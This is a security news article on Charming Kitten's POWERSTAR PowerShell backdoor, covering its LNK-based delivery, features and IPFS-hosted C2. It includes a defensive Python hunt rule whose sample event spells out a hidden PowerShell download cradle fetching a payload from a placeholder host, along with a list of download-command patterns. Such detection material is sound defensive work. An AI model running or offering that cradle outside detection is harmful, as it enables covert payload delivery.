Charming Kitten, a nation-state actor associated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been identified as the perpetrator behind a sophisticated spear-phishing campaign utilizing an updated version of the powerful PowerShell backdoor known as POWERSTAR. This backdoor, also referred to as CharmPower, has been deployed in targeted espionage attacks aimed at gathering sensitive information.
According to researchers at Volexity, the malware used in the campaign has undergone significant improvements in operational security measures, making it more challenging to analyze and gather intelligence. Charming Kitten is well-known for its expertise in social engineering tactics, often creating tailored fake personas on social media platforms to establish rapport with targets before delivering malicious links. The group is also known by other names such as APT35, Cobalt Illusion, Mint Sandstorm, and Yellow Garuda.
Recent intrusions attributed to Charming Kitten have involved the use of other implants, including PowerLess and BellaCiao, indicating the group's extensive arsenal of espionage tools.
The POWERSTAR backdoor was initially uncovered by Check Point in January 2022, revealing its association with attacks exploiting the Log4Shell vulnerabilities in publicly exposed Java applications. Since then, it has been observed in at least two other campaigns, as documented by PwC and Microsoft.
In the May 2023 attack wave, Volexity detected a variant of POWERSTAR distributed via a password-protected RAR file containing an LNK file that downloads the backdoor from Backblaze. Notably, Charming Kitten took measures to impede analysis by delivering the decryption method separately from the initial code and avoiding writing it to disk.
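The delivery chain described above (an LNK inside a password-protected RAR launching PowerShell, which fetches the backdoor from Backblaze and keeps the decryption logic off disk) is something a detection engineer can turn into a hunt rule over process-creation telemetry. The following is an added example, not code from Volexity or from the article; the event field names, the download-cue strings, the placeholder host and the sample events are all assumptions or constructed for illustration.

```python
# Added example: a hunt rule for the reported LNK -> PowerShell -> cloud-download chain.
# Field names are an assumption, modelled loosely on Sysmon Event ID 1 (process creation).
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line as logged


# Common PowerShell download primitives (assumed, not taken from the report) and the
# hosting provider the article names; matching is case-insensitive substring.
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "iwr ")
HOST_CUES = ("backblaze",)


def is_lnk_download_cradle(ev: ProcEvent) -> bool:
    """Flag PowerShell started by the shell (how a double-clicked LNK launches) that pulls
    content from the reported cloud host without a script file ever being written to disk."""
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    cmd = ev.command_line.lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    if not parent.endswith("explorer.exe"):
        return False
    if not any(cue in cmd for cue in DOWNLOAD_CUES):
        return False
    # Fileless execution: no .ps1 on the command line, hidden or encoded invocation.
    hidden = "-w hidden" in cmd or "-windowstyle hidden" in cmd or "-enc" in cmd
    fileless = ".ps1" not in cmd and hidden
    return fileless and any(host in cmd for host in HOST_CUES)


def hunt(events):
    """Return only the events that match the rule."""
    return [ev for ev in events if is_lnk_download_cradle(ev)]


# Constructed sample events (not real telemetry); the URL host is a placeholder.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(PS, "C:\\Windows\\explorer.exe",
              "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
              ".DownloadString('https://backblaze-host.example/EXAMPLE-BUCKET/stage1')\""),
    ProcEvent(PS, "C:\\Windows\\explorer.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\alice\\scripts\\backup.ps1"),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("suspicious:", hit.command_line)
```

Only the first constructed event matches; a legitimate `-File` script launch and a plain cmd.exe launch from the shell do not.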
POWERSTAR boasts a wide range of features, enabling remote execution of PowerShell and C# commands, system information collection, persistence establishment, and module downloading. It can also perform tasks like process enumeration, screenshot capture, file search, and monitoring of persistence components. The malware's cleanup module has been improved to erase its traces and delete persistence-related registry keys, underscoring Charming Kitten's dedication to refining techniques and evading detection.
Volexity researchers also discovered another variant of POWERSTAR attempting to retrieve a hard-coded command-and-control (C2) server by decoding a file stored on the decentralized InterPlanetary Filesystem (IPFS). This highlights the group's efforts to enhance the resilience of its attack infrastructure.
The cybersecurity community continues to monitor Charming Kitten's activities closely, with the group's use of POWERSTAR pointing to a broader set of tools employed for malware-enabled espionage.